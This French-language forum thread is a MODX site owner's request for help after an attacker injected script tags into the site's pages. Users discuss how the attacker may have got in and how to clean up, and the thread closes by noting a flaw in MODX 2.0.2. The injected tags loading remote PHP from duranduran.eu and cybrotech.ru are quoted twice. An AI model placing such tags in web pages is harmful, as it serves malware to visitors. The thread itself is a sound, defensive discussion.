We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 11990
    • 12 Posts
    Bonsoir la communauté !

    Je suis en train de développer un site sous modx. Tout se passe bien à un détail près qui est TRES gênant ! Mon site s’est fait attaqué et deux scripts de code sont injectés. Résultats, Google le répertorie comme site diffusant des logiciels malveillants. J’ai beau cherché, je vois pas comment supprimer cette injection de code.

    Voici sous quelle forme le code est injecté :

    <html>
    <head>
    <title>Mon site</title>
    <base href="urldemonsite" />
    </head><script src=http://duranduran.eu/images/download.php ></script><script src=http://cybrotech.ru/uploads/feedback_process.php ></script>
    <body>
    


    Est-ce que quelqu’un a eu ce genre de problème ? Comment enlever ces deux scripts ?
      • 36474
      • 108 Posts
      Je comprends pas trop. Par ou ils sont rentrer pour l’injection.

      <script src=http://duranduran.eu/images/download.php ></script><script src=http://cybrotech.ru/uploads/feedback_process.php ></script>


      A vu d’oeil, je suis pas un expert. Mais je suppute que tu a mis un script de download sur ton site. Qu’ils auraient peut-être utilisé pour l’injection.

      Pour enlever les scripts tu vires les balises script et tout ce qu’il y a entre les deux. Un gros nettoyage dans tout tes scripts, serait un bon début.
      Je suis pas assez fort pour t’en dire plus.
        • 11990
        • 12 Posts
        Il n’y a absolument rien à télécharger sur mon site.
        Le problème, c’est que je ne sais où supprimer ces scripts vu qu’ils s’injectent quasi automatiquement.
        Je viens de regarder et même dans le manager, il y a ces scripts ! C’est dingue quand même !
          • 36474
          • 108 Posts
          Je suppute mal alors. rolleyes

          S’il y a eu injection, ils sont rentrés forcément par quelques part. Si tu es sûre de n’avoir aucun script à toi sur ton site alors ca vient de modx et il faut avertir les big boss sur le forum anglais.

          Quand je dis script à toi, ca comprends les scripts que tu pourrais utiliser, genre script gallerie, video ou tout autre script sans lien avec Modx. En général ce sont des scripts connues que les robots repères.

          Tu peux aussi avoir ton ftp de compromis ou encore ta base données.

          Commence par bloquer tout les accés à ton site, ensuite compare l’ensemble de ton arborescence avec celui d’une de tes sauvegardes en local, par exemple.

            • 11990
            • 12 Posts
            C’est possible alors que ce soit via une ancienne galerie ou forum.
            Je vais chercher de ce côté-là.
            En attendant, j’ai également modifié les accès ftp, sait-on jamais. je vous tiendrai au courant de l’évolution de la chose. Merci en tout cas YopYop.
              • 36474
              • 108 Posts
              Ca m’etais arriver sur un site j’avais installer Coppermine --> un script de gallerie, j’avais pas fait la mise à jour et ce fut le drame.

              C’est souvent ca.

              Bon courage et tient nous au courant.
                • 33976 ☆ A M B ☆
                • 571 Posts
                Bonsoir,

                Quelle version de MODx utilises-tu ? Quel hébergeur également ? Cela pourrait aider smiley
                  • 11990
                  • 12 Posts
                  Je viens d’upgrader à Modx 2.0.3. L’hébergeur, c’est kreativmedia(.ch)
                    • 11990
                    • 12 Posts
                    Bon, je ne sais pas si c’est grâce à la version 2.0.3 mais le code a disparu (du moins, pour le moment). Je verrai bien dans les jours à venir si cela continue. En attendant, je pense qu’on peut dire que ce sujet est résolu.
                      • 34001
                      • 428 Posts
                      Quote from: Hellvetic at Oct 02, 2010, 05:12 AM

                      Bon, je ne sais pas si c’est grâce à la version 2.0.3 mais le code a disparu (du moins, pour le moment). Je verrai bien dans les jours à venir si cela continue. En attendant, je pense qu’on peut dire que ce sujet est résolu.
                      Il y avait une faille de sécurité dans la version 2.0.2, et apparemment, certains n’ont pas perdu de temps pour l’exploiter.
                      A priori, tu es donc tranquille avec la version 2.0.3. smiley
                        Intégrateur web freelance